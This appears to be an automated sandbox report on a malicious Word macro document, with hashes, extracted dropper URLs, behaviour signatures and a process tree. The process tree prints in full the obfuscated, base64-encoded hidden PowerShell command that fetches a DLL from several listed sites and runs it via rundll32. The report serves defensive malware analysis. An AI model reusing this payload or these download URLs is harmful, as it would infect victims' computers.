e8d579c456668ede56746433ab1425c07bedeec985a0f811291f3f8b506ee949

General

Target

file_1301_2021.doc
Size

167KB
MD5

814b00fee318c4790f0a6c4601705eae
SHA1

74090f9d22d889404898e352d67bf7feb95b1947
SHA256

295f317f093c9e9c7cac20d70e708074f9d5ca0285de2e140ded000d0a196f47
SHA512

ba265a75e1e7b7b048082d8d1cd79bc16d1cb77df15028ae7bbcc3f1786e819ea64daf99459bd82b7f7229eb653704d2b4e3aaa3da51726ebaf68022ef231c80

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://transfersuvan.com/wp-admin/yhUw0GU/

exe.dropper

http://equipamentosmix.com/1/TRM/

exe.dropper

http://vedavacademy.com/wp-admin/7BHbH/

exe.dropper

http://lezz-etci.com/wp-content/mXxP/

exe.dropper

https://lapiramideopticas.com/tesla-powerwall-ok3h2/kmJ/

exe.dropper

http://aryasamajmandirkanpur.com/cgi-bin/VcJK/

exe.dropper

http://music.mnahid.com/wp-admin/kCGrt8/

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2388 3288 cmd.exe
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

16 1268 powershell.exe
34 1268 powershell.exe
35 3688 rundll32.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2172 rundll32.exe
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Bpeqptxve\vfmovgyv.dkg rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2388	3288	cmd.exe

flow	pid	process
16	1268	powershell.exe
34	1268	powershell.exe
35	3688	rundll32.exe

pid	process
2172	rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Bpeqptxve\vfmovgyv.dkg	rundll32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

744 WINWORD.EXE
744 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exerundll32.exe

pid process

1268 powershell.exe
1268 powershell.exe
1268 powershell.exe
3688 rundll32.exe
3688 rundll32.exe
3688 rundll32.exe
3688 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1268 powershell.exe

pid	process
1268	powershell.exe
1268	powershell.exe
1268	powershell.exe
3688	rundll32.exe
3688	rundll32.exe
3688	rundll32.exe
3688	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	1268	powershell.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

WINWORD.EXE

pid	process
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 2388 wrote to memory of 2764	2388	cmd.exe	msg.exe
PID 2388 wrote to memory of 2764	2388	cmd.exe	msg.exe
PID 2388 wrote to memory of 1268	2388	cmd.exe	powershell.exe
PID 2388 wrote to memory of 1268	2388	cmd.exe	powershell.exe
PID 1268 wrote to memory of 2224	1268	powershell.exe	rundll32.exe
PID 1268 wrote to memory of 2224	1268	powershell.exe	rundll32.exe
PID 2224 wrote to memory of 2172	2224	rundll32.exe	rundll32.exe
PID 2224 wrote to memory of 2172	2224	rundll32.exe	rundll32.exe
PID 2224 wrote to memory of 2172	2224	rundll32.exe	rundll32.exe
PID 2172 wrote to memory of 3688	2172	rundll32.exe	rundll32.exe
PID 2172 wrote to memory of 3688	2172	rundll32.exe	rundll32.exe
PID 2172 wrote to memory of 3688	2172	rundll32.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\file_1301_2021.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:744

C:\Windows\system32\cmd.exe
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQB0ACAAIAA5AFoAagAxAEkAeAAgACAAKAAgACAAWwBUAFkAUABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBpAFIARQBjACcALAAnAHQAJwAsACcAZAAnACwAJwBvAHIAeQAnACwAJwBzAHkAUwBUAGUAbQAuAEkAbwAuACcAKQApACAAOwAgACAAIAAgAFMARQB0AC0AaQBUAGUAbQAgACAAVgBBAFIASQBhAEIATABlADoANgBoAHcAIAAoAFsAVAB5AFAARQBdACgAIgB7ADgAfQB7ADUAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADYAfQB7ADcAfQB7ADIAfQB7ADMAfQAiACAALQBGACcAZQBNAC4AbgBlAHQALgBzACcALAAnAGUAcgBWACcALAAnAGkATgB0AE0AYQBuAGEARwAnACwAJwBFAFIAJwAsACcASQAnACwAJwB0ACcALAAnAEMAZQAnACwAJwBwAE8AJwAsACcAcwB5AFMAJwApACAAKQAgACAAOwAkAEsAdgBpAGQAegBvADEAPQAkAFAAMQA1AEwAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFUAXwAzAEYAOwAkAEQANAA2AEQAPQAoACcAVwAnACsAKAAnAF8AOAAnACsAJwBRACcAKQApADsAIAAoACAAZwBFAFQALQBWAEEAUgBJAGEAQgBMAEUAIAAgADkAWgBKADEAaQBYACAALQBWAGEATABVAGUAbwBuAEwAWQApADoAOgAiAEMAUgBlAEEAVABgAGUARABJAHIAZQBgAEMAdABvAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBjAEYAJwArACcAbQAnACkAKwAnAEUAJwArACgAJwBjACcAKwAnAHIAcgAnACkAKwAoACcAZwBzACcAKwAnAG0AYwAnACkAKwAoACcARgBtACcAKwAnAEQAeQAnACkAKwAnAHkAJwArACgAJwAzADcAJwArACcAMwBkAGMAJwApACsAJwBGAG0AJwApAC4AIgByAGAAZQBgAHAAbABhAEMAZQAiACgAKAAnAGMAJwArACcARgBtACcAKQAsAFsAUwB0AFIAaQBOAEcAXQBbAEMASABhAHIAXQA5ADIAKQApACkAOwAkAE0AMwBfAFQAPQAoACgAJwBYACcAKwAnADYAMgAnACkAKwAnAEcAJwApADsAIAAoAGcAZQB0AC0AdgBhAFIAaQBhAEIATABlACAAIAA2AGgAdwAgACAALQBWAEEATAApADoAOgAiAFMAYABlAGAAYwB1AGAAUgBgAEkAdAB5AFAAcgBvAHQAbwBjAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQARgA4ADYAVAA9ACgAKAAnAFIAXwAnACsAJwAzACcAKQArACcARgAnACkAOwAkAEYAMAAzAHYANQA4AHQAIAA9ACAAKAAnAEQAJwArACgAJwAzADQAJwArACcAQQAnACkAKQA7ACQAQgA1AF8AVwA9ACgAJwBVACcAKwAoACcAMwAnACsAJwAyAEgAJwApACkAOwAkAEcAegBiADQANwA5ADEAPQAkAEgATwBNAEUAKwAoACgAKAAnAEQAZQAnACsAJwBYACcAKQArACcARQBjACcAKwAoACcAcgByAGcAcwAnACsAJwBtACcAKQArACgAJwBEAGUAJwArACcAWABEAHkAeQAzACcAKQArACcANwAnACsAKAAnADMAJwArACcAZABEACcAKQArACcAZQBYACcAKQAuACIAUgBFAGAAcABsAEEAYABDAGUAIgAoACgAWwBDAEgAQQBSAF0ANgA4ACsAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQA4ADgAKQAsAFsAUwB0AFIASQBOAEcAXQBbAEMASABBAFIAXQA5ADIAKQApACsAJABGADAAMwB2ADUAOAB0ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABKADEAOABVAD0AKAAnAEkAJwArACgAJwA5AF8AJwArACcATAAnACkAKQA7ACQATABrAGgAeABvADkAbwA9ACgAJwBBACcAKwAnAF0AJwArACgAJwBbAHEAWwAnACsAJwBEADoALwAvAHQAcgAnACkAKwAnAGEAJwArACcAbgBzACcAKwAoACcAZgAnACsAJwBlAHIAcwB1AHYAJwArACcAYQAnACkAKwAnAG4ALgAnACsAJwBjACcAKwAoACcAbwBtACcAKwAnAC8AJwApACsAJwB3AHAAJwArACgAJwAtAGEAJwArACcAZABtACcAKQArACgAJwBpAG4ALwB5AGgAVQAnACsAJwB3ADAAJwArACcARwBVACcAKQArACcALwBAACcAKwAoACcAQQBdAFsAJwArACcAcQBbAEQAJwArACcAOgAvAC8AZQAnACsAJwBxAHUAaQAnACsAJwBwACcAKwAnAGEAbQBlAG4AdAAnACkAKwAoACcAbwBzACcAKwAnAG0AJwArACcAaQB4AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AMQAnACsAJwAvAFQAJwArACcAUgBNACcAKQArACcALwBAACcAKwAnAEEAJwArACcAXQAnACsAJwBbACcAKwAoACcAcQBbACcAKwAnAEQAOgAvACcAKQArACgAJwAvACcAKwAnAHYAZQAnACkAKwAoACcAZAAnACsAJwBhAHYAYQBjACcAKQArACgAJwBhAGQAJwArACcAZQBtAHkALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKQArACcAbQAnACsAKAAnAGkAbgAvADcAQgAnACsAJwBIAGIASAAvACcAKwAnAEAAJwApACsAKAAnAEEAXQBbACcAKwAnAHEAJwApACsAJwBbACcAKwAoACcARAA6ACcAKwAnAC8AJwApACsAKAAnAC8AbAAnACsAJwBlACcAKQArACgAJwB6ACcAKwAnAHoALQAnACkAKwAoACcAZQB0AGMAaQAnACsAJwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAcAAtAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAJwArACcAbgB0ACcAKQArACgAJwAvAG0AWAAnACsAJwB4ACcAKQArACgAJwBQACcAKwAnAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAnAFsARAAnACsAJwBzACcAKwAoACcAOgAvAC8AbABhAHAAJwArACcAaQAnACkAKwAnAHIAJwArACcAYQBtACcAKwAnAGkAZAAnACsAJwBlAG8AJwArACcAcAAnACsAJwB0ACcAKwAoACcAaQBjACcAKwAnAGEAJwApACsAJwBzAC4AJwArACgAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAdABlACcAKwAoACcAcwAnACsAJwBsAGEAJwApACsAKAAnAC0AJwArACcAcABvACcAKQArACgAJwB3ACcAKwAnAGUAJwArACcAcgB3ACcAKwAnAGEAbABsAC0AbwBrADMAJwApACsAKAAnAGgAMgAnACsAJwAvACcAKQArACcAawBtACcAKwAnAEoALwAnACsAJwBAACcAKwAoACcAQQBdAFsAcQAnACsAJwBbACcAKQArACcARAAnACsAKAAnADoALwAnACsAJwAvACcAKQArACcAYQAnACsAJwByACcAKwAoACcAeQAnACsAJwBhAHMAJwApACsAJwBhACcAKwAnAG0AYQAnACsAKAAnAGoAbQBhAG4AZABpAHIAawAnACsAJwBhAG4AcAAnACsAJwB1AHIALgBjACcAKQArACgAJwBvAG0AJwArACcALwAnACkAKwAoACcAYwBnACcAKwAnAGkAJwArACcALQBiAGkAbgAvAFYAYwBKACcAKQArACcASwAnACsAJwAvAEAAJwArACgAJwBBAF0AJwArACcAWwAnACkAKwAnAHEAJwArACcAWwBEACcAKwAoACcAOgAvAC8AJwArACcAbQAnACkAKwAnAHUAJwArACcAcwAnACsAJwBpAGMAJwArACgAJwAuAG0AJwArACcAbgBhACcAKQArACcAaABpACcAKwAnAGQALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAZAAnACsAJwBtAGkAbgAnACsAJwAvAGsAQwAnACkAKwAnAEcAJwArACgAJwByAHQAOAAnACsAJwAvACcAKQApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAEEAJwArACcAXQBbACcAKQArACgAJwBxACcAKwAnAFsARAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAJwBkAHMAJwArACgAJwBlACcAKwAnAHcAZgAnACkAKQAsACgAKAAnAHcAJwArACcAZQB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQBlACcAKwAnAGYAJwApACsAJwBmACcAKQAsACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACkAKQBbADIAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABOADkAOQBRACAAKwAgACQASwB2AGkAZAB6AG8AMQAgACsAIAAkAFcAOAA1AEcAKQA7ACQARwBfAF8ASwA9ACgAJwBOADYAJwArACcANABMACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARAAyAGkAdQA2ADIAagAgAGkAbgAgACQATABrAGgAeABvADkAbwApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAVABFAE0ALgBOAGUAVAAuAFcAZQBiAEMATABJAGUATgB0ACkALgAiAEQATwBXAE4AYABsAG8AYABBAGQARgBJAGAAbABlACIAKAAkAEQAMgBpAHUANgAyAGoALAAgACQARwB6AGIANAA3ADkAMQApADsAJABBADYAMwBTAD0AKAAnAFAAJwArACgAJwA0ADYAJwArACcAWgAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABHAHoAYgA0ADcAOQAxACkALgAiAEwAZQBOAEcAYABUAEgAIgAgAC0AZwBlACAAMwAxADAANAAxACkAIAB7ACYAKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAEcAegBiADQANwA5ADEALAAoACcAUwAnACsAKAAnAGgAbwB3ACcAKwAnAEQAaQAnACkAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAE8AcwBUAGAAUgBgAGkATgBHACIAKAApADsAJABHADAAMgBWAD0AKAAnAFAAJwArACgAJwA1ADgAJwArACcAWAAnACkAKQA7AGIAcgBlAGEAawA7ACQAVAAwADcAVQA9ACgAJwBCADQAJwArACcAMwBUACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQA2ADYAWAA9ACgAKAAnAFEAMQAnACsAJwA1ACcAKQArACcATwAnACkA
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2388
- C:\Windows\system32\msg.exe
  msg Admin /v Word experienced an error trying to open the file.
  2⤵
  PID:2764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -enc IAAgAHMAZQB0ACAAIAA5AFoAagAxAEkAeAAgACAAKAAgACAAWwBUAFkAUABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBpAFIARQBjACcALAAnAHQAJwAsACcAZAAnACwAJwBvAHIAeQAnACwAJwBzAHkAUwBUAGUAbQAuAEkAbwAuACcAKQApACAAOwAgACAAIAAgAFMARQB0AC0AaQBUAGUAbQAgACAAVgBBAFIASQBhAEIATABlADoANgBoAHcAIAAoAFsAVAB5AFAARQBdACgAIgB7ADgAfQB7ADUAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADYAfQB7ADcAfQB7ADIAfQB7ADMAfQAiACAALQBGACcAZQBNAC4AbgBlAHQALgBzACcALAAnAGUAcgBWACcALAAnAGkATgB0AE0AYQBuAGEARwAnACwAJwBFAFIAJwAsACcASQAnACwAJwB0ACcALAAnAEMAZQAnACwAJwBwAE8AJwAsACcAcwB5AFMAJwApACAAKQAgACAAOwAkAEsAdgBpAGQAegBvADEAPQAkAFAAMQA1AEwAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFUAXwAzAEYAOwAkAEQANAA2AEQAPQAoACcAVwAnACsAKAAnAF8AOAAnACsAJwBRACcAKQApADsAIAAoACAAZwBFAFQALQBWAEEAUgBJAGEAQgBMAEUAIAAgADkAWgBKADEAaQBYACAALQBWAGEATABVAGUAbwBuAEwAWQApADoAOgAiAEMAUgBlAEEAVABgAGUARABJAHIAZQBgAEMAdABvAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBjAEYAJwArACcAbQAnACkAKwAnAEUAJwArACgAJwBjACcAKwAnAHIAcgAnACkAKwAoACcAZwBzACcAKwAnAG0AYwAnACkAKwAoACcARgBtACcAKwAnAEQAeQAnACkAKwAnAHkAJwArACgAJwAzADcAJwArACcAMwBkAGMAJwApACsAJwBGAG0AJwApAC4AIgByAGAAZQBgAHAAbABhAEMAZQAiACgAKAAnAGMAJwArACcARgBtACcAKQAsAFsAUwB0AFIAaQBOAEcAXQBbAEMASABhAHIAXQA5ADIAKQApACkAOwAkAE0AMwBfAFQAPQAoACgAJwBYACcAKwAnADYAMgAnACkAKwAnAEcAJwApADsAIAAoAGcAZQB0AC0AdgBhAFIAaQBhAEIATABlACAAIAA2AGgAdwAgACAALQBWAEEATAApADoAOgAiAFMAYABlAGAAYwB1AGAAUgBgAEkAdAB5AFAAcgBvAHQAbwBjAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQARgA4ADYAVAA9ACgAKAAnAFIAXwAnACsAJwAzACcAKQArACcARgAnACkAOwAkAEYAMAAzAHYANQA4AHQAIAA9ACAAKAAnAEQAJwArACgAJwAzADQAJwArACcAQQAnACkAKQA7ACQAQgA1AF8AVwA9ACgAJwBVACcAKwAoACcAMwAnACsAJwAyAEgAJwApACkAOwAkAEcAegBiADQANwA5ADEAPQAkAEgATwBNAEUAKwAoACgAKAAnAEQAZQAnACsAJwBYACcAKQArACcARQBjACcAKwAoACcAcgByAGcAcwAnACsAJwBtACcAKQArACgAJwBEAGUAJwArACcAWABEAHkAeQAzACcAKQArACcANwAnACsAKAAnADMAJwArACcAZABEACcAKQArACcAZQBYACcAKQAuACIAUgBFAGAAcABsAEEAYABDAGUAIgAoACgAWwBDAEgAQQBSAF0ANgA4ACsAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQA4ADgAKQAsAFsAUwB0AFIASQBOAEcAXQBbAEMASABBAFIAXQA5ADIAKQApACsAJABGADAAMwB2ADUAOAB0ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABKADEAOABVAD0AKAAnAEkAJwArACgAJwA5AF8AJwArACcATAAnACkAKQA7ACQATABrAGgAeABvADkAbwA9ACgAJwBBACcAKwAnAF0AJwArACgAJwBbAHEAWwAnACsAJwBEADoALwAvAHQAcgAnACkAKwAnAGEAJwArACcAbgBzACcAKwAoACcAZgAnACsAJwBlAHIAcwB1AHYAJwArACcAYQAnACkAKwAnAG4ALgAnACsAJwBjACcAKwAoACcAbwBtACcAKwAnAC8AJwApACsAJwB3AHAAJwArACgAJwAtAGEAJwArACcAZABtACcAKQArACgAJwBpAG4ALwB5AGgAVQAnACsAJwB3ADAAJwArACcARwBVACcAKQArACcALwBAACcAKwAoACcAQQBdAFsAJwArACcAcQBbAEQAJwArACcAOgAvAC8AZQAnACsAJwBxAHUAaQAnACsAJwBwACcAKwAnAGEAbQBlAG4AdAAnACkAKwAoACcAbwBzACcAKwAnAG0AJwArACcAaQB4AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AMQAnACsAJwAvAFQAJwArACcAUgBNACcAKQArACcALwBAACcAKwAnAEEAJwArACcAXQAnACsAJwBbACcAKwAoACcAcQBbACcAKwAnAEQAOgAvACcAKQArACgAJwAvACcAKwAnAHYAZQAnACkAKwAoACcAZAAnACsAJwBhAHYAYQBjACcAKQArACgAJwBhAGQAJwArACcAZQBtAHkALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKQArACcAbQAnACsAKAAnAGkAbgAvADcAQgAnACsAJwBIAGIASAAvACcAKwAnAEAAJwApACsAKAAnAEEAXQBbACcAKwAnAHEAJwApACsAJwBbACcAKwAoACcARAA6ACcAKwAnAC8AJwApACsAKAAnAC8AbAAnACsAJwBlACcAKQArACgAJwB6ACcAKwAnAHoALQAnACkAKwAoACcAZQB0AGMAaQAnACsAJwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAcAAtAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAJwArACcAbgB0ACcAKQArACgAJwAvAG0AWAAnACsAJwB4ACcAKQArACgAJwBQACcAKwAnAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAnAFsARAAnACsAJwBzACcAKwAoACcAOgAvAC8AbABhAHAAJwArACcAaQAnACkAKwAnAHIAJwArACcAYQBtACcAKwAnAGkAZAAnACsAJwBlAG8AJwArACcAcAAnACsAJwB0ACcAKwAoACcAaQBjACcAKwAnAGEAJwApACsAJwBzAC4AJwArACgAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAdABlACcAKwAoACcAcwAnACsAJwBsAGEAJwApACsAKAAnAC0AJwArACcAcABvACcAKQArACgAJwB3ACcAKwAnAGUAJwArACcAcgB3ACcAKwAnAGEAbABsAC0AbwBrADMAJwApACsAKAAnAGgAMgAnACsAJwAvACcAKQArACcAawBtACcAKwAnAEoALwAnACsAJwBAACcAKwAoACcAQQBdAFsAcQAnACsAJwBbACcAKQArACcARAAnACsAKAAnADoALwAnACsAJwAvACcAKQArACcAYQAnACsAJwByACcAKwAoACcAeQAnACsAJwBhAHMAJwApACsAJwBhACcAKwAnAG0AYQAnACsAKAAnAGoAbQBhAG4AZABpAHIAawAnACsAJwBhAG4AcAAnACsAJwB1AHIALgBjACcAKQArACgAJwBvAG0AJwArACcALwAnACkAKwAoACcAYwBnACcAKwAnAGkAJwArACcALQBiAGkAbgAvAFYAYwBKACcAKQArACcASwAnACsAJwAvAEAAJwArACgAJwBBAF0AJwArACcAWwAnACkAKwAnAHEAJwArACcAWwBEACcAKwAoACcAOgAvAC8AJwArACcAbQAnACkAKwAnAHUAJwArACcAcwAnACsAJwBpAGMAJwArACgAJwAuAG0AJwArACcAbgBhACcAKQArACcAaABpACcAKwAnAGQALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAZAAnACsAJwBtAGkAbgAnACsAJwAvAGsAQwAnACkAKwAnAEcAJwArACgAJwByAHQAOAAnACsAJwAvACcAKQApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAEEAJwArACcAXQBbACcAKQArACgAJwBxACcAKwAnAFsARAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAJwBkAHMAJwArACgAJwBlACcAKwAnAHcAZgAnACkAKQAsACgAKAAnAHcAJwArACcAZQB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQBlACcAKwAnAGYAJwApACsAJwBmACcAKQAsACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACkAKQBbADIAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABOADkAOQBRACAAKwAgACQASwB2AGkAZAB6AG8AMQAgACsAIAAkAFcAOAA1AEcAKQA7ACQARwBfAF8ASwA9ACgAJwBOADYAJwArACcANABMACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARAAyAGkAdQA2ADIAagAgAGkAbgAgACQATABrAGgAeABvADkAbwApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAVABFAE0ALgBOAGUAVAAuAFcAZQBiAEMATABJAGUATgB0ACkALgAiAEQATwBXAE4AYABsAG8AYABBAGQARgBJAGAAbABlACIAKAAkAEQAMgBpAHUANgAyAGoALAAgACQARwB6AGIANAA3ADkAMQApADsAJABBADYAMwBTAD0AKAAnAFAAJwArACgAJwA0ADYAJwArACcAWgAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABHAHoAYgA0ADcAOQAxACkALgAiAEwAZQBOAEcAYABUAEgAIgAgAC0AZwBlACAAMwAxADAANAAxACkAIAB7ACYAKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAEcAegBiADQANwA5ADEALAAoACcAUwAnACsAKAAnAGgAbwB3ACcAKwAnAEQAaQAnACkAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAE8AcwBUAGAAUgBgAGkATgBHACIAKAApADsAJABHADAAMgBWAD0AKAAnAFAAJwArACgAJwA1ADgAJwArACcAWAAnACkAKQA7AGIAcgBlAGEAawA7ACQAVAAwADcAVQA9ACgAJwBCADQAJwArACcAMwBUACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQA2ADYAWAA9ACgAKAAnAFEAMQAnACsAJwA1ACcAKQArACcATwAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Ecrrgsm\Dyy373d\D34A.dll,ShowDialogA
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2224
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Ecrrgsm\Dyy373d\D34A.dll,ShowDialogA
      4⤵
      Loads dropped DLL
      Drops file in System32 directory
      Suspicious use of WriteProcessMemory
      PID:2172
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bpeqptxve\vfmovgyv.dkg",ShowDialogA
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:3688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Ecrrgsm\Dyy373d\D34A.dll

MD5
fda2b3befb8e609ccfb4e91996c74cd1

SHA1
e5c0952da8c862843a37d5abf9bbbade3455373a

SHA256
cf5d60bee4ad4effa32f3ab605ddb9012264c9bbc997381d30cd4f6ddc077704

SHA512
384a3dd304e807aaacc71fce378f525260182b833786b09945fefa64e61e9e4855961e3b04b857cf58bb34cd58edca0f9b6da84c6a4a3aec28fa68b8e2e4921c

Download Submit
\Users\Admin\Ecrrgsm\Dyy373d\D34A.dll

MD5
fda2b3befb8e609ccfb4e91996c74cd1

SHA1
e5c0952da8c862843a37d5abf9bbbade3455373a

SHA256
cf5d60bee4ad4effa32f3ab605ddb9012264c9bbc997381d30cd4f6ddc077704

SHA512
384a3dd304e807aaacc71fce378f525260182b833786b09945fefa64e61e9e4855961e3b04b857cf58bb34cd58edca0f9b6da84c6a4a3aec28fa68b8e2e4921c

Download Submit
memory/744-2-0x00007FFF69650000-0x00007FFF69C87000-memory.dmp

Filesize
6.2MB

Download
memory/1268-4-0x0000000000000000-mapping.dmp

Download
memory/1268-5-0x00007FFF60FB0000-0x00007FFF6199C000-memory.dmp

Filesize
9.9MB

Download
memory/1268-6-0x0000021B5BE40000-0x0000021B5BE41000-memory.dmp

Filesize
4KB

Download
memory/1268-7-0x0000021B5C110000-0x0000021B5C111000-memory.dmp

Filesize
4KB

Download
memory/2172-10-0x0000000000000000-mapping.dmp

Download
memory/2224-8-0x0000000000000000-mapping.dmp

Download
memory/2764-3-0x0000000000000000-mapping.dmp

Download
memory/3688-12-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads